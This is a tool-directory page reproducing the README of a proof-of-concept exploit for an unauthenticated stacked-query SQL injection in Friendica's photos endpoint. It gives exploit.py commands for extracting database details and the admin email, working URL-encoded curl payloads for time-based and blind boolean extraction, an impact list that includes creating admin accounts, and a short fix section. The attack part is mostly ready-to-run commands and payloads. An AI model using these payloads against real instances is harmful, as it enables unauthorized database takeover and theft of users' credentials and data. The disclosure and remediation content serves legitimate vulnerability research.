Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-72550-poc — CVE-2026-72550 — Friendica Unauthenticated Stacked-Query SQL Injection PoC (CVSS 9.8 Critical) | Kitploit
Tools/GitHubGitHub/abdugafforov-bobur/cve-2026-72550-poc
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation GatheringWeb SecurityPenetration Testing
GitHub
abdugafforov-bobur/cve-2026-72550-poc

CVE-2026-72550-poc

CVE-2026-72550 — Friendica Unauthenticated Stacked-Query SQL Injection PoC (CVSS 9.8 Critical)

View Repository
151 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-72550 — Friendica Unauthenticated SQL Injection

Unauthenticated stacked-query SQL injection in the photos endpoint in Friendica allows any visitor to run arbitrary SQL.

FieldValue
CVE IDCVE-2026-72550
ProductFriendica (self-hosted federated social network)
Affected<= 2026.08-dev (git HEAD e3fc1bc)
TypeCWE-89: SQL Injection (unauthenticated, stacked queries)
SeverityCritical — CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Auth requiredNone

Summary

The photo-view endpoint in Friendica takes the order query parameter and concatenates it, unescaped, into a SHOW COLUMNS ... LIKE '...' statement that is run through a bare PDO::query() — which allows multiple statements. No login is required, and on a stock install (block_public is off by default) any publicly visible photo is enough. Because PDO::query() executes stacked statements, an anonymous attacker doesn't just read data — they run arbitrary SQL, including INSERT/UPDATE to create an admin user.

Vulnerable Code Path

mod/photos.php:673              — reads raw $_GET['order']
DBStructure::existsColumn()     — concatenates into: SHOW COLUMNS FROM `photo` LIKE '$column'
  src/Database/DBStructure.php:714
DBA::p() → PDO::query()         — executes with stacked statements enabled

The default request path reaches this code: $cmd defaults to 'view' (satisfying the $cmd === 'view' gate) and no_count is off, so no authentication and no non-default setting is needed.

Usage

# Install dependency
pip install requests

# Check if target is vulnerable (time-based detection)
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --check-only

# Extract database version via blind SQLi
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract version

# Extract current database user
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_user

# Extract current database name
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_name

# Extract first admin email
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract admin_email

Parameters

FlagDescription
-u / --urlTarget base URL (e.g. http://target:8176)
-r / --userUsername whose photo gallery to hit
-i / --resource-idResource ID of any publicly visible photo
--extractValue to exfiltrate: version, db_user, db_name, admin_email
--check-onlyOnly test vulnerability, don't extract data
--sleepSLEEP delay in seconds (default: 5)

Manual Reproduction

No cookies or authentication needed. Point it at any public photo resource-id:

# Control — valid order, returns fast (~0.05s)
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=created"

# Injection — stacked SLEEP(5) executes, response held ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20SLEEP(5)--%20-"

Decoded payload: x';SELECT SLEEP(5)-- -

The injected SQL becomes:

SHOW COLUMNS FROM `photo` LIKE 'x';SELECT SLEEP(5)-- -'

Blind Boolean Extraction

# TRUE condition (@@version starts with '1') → delays ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%271%27,SLEEP(5),0)--%20-"

# FALSE condition (@@version starts with '9') → returns fast
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%279%27,SLEEP(5),0)--%20-"

Impact

An unauthenticated attacker can:

  • Read any data from the database (blind extraction of credentials, emails, private messages)
  • Write arbitrary rows — including creating an administrator account via INSERT INTO user
  • Modify existing data — escalate any user to admin, tamper with posts, reset passwords
  • Delete data or drop tables (denial of service)

This is a full database compromise reachable by any anonymous visitor on a default Friendica install.

Fix

  1. Validate order against the known column whitelist before use
  2. Use parameterized queries instead of string concatenation in SHOW COLUMNS
  3. Disable multi-statement execution on the PDO connection (PDO::ATTR_EMULATE_PREPARES => false)

Timeline

DateEvent
2026-07-07Vulnerability discovered and confirmed on local instance
2026-08-11CVE-2026-72550 published via TuranSec CNA

Disclaimer

This tool is provided for authorized security testing and educational purposes only. Use it only against systems you own or have explicit written permission to test. The author assumes no liability for misuse.

Credits

Discovered by Bobur Abdugafforov (@abdugafforov-bobur)

CVE assigned via TuranSec CNA

Download Tool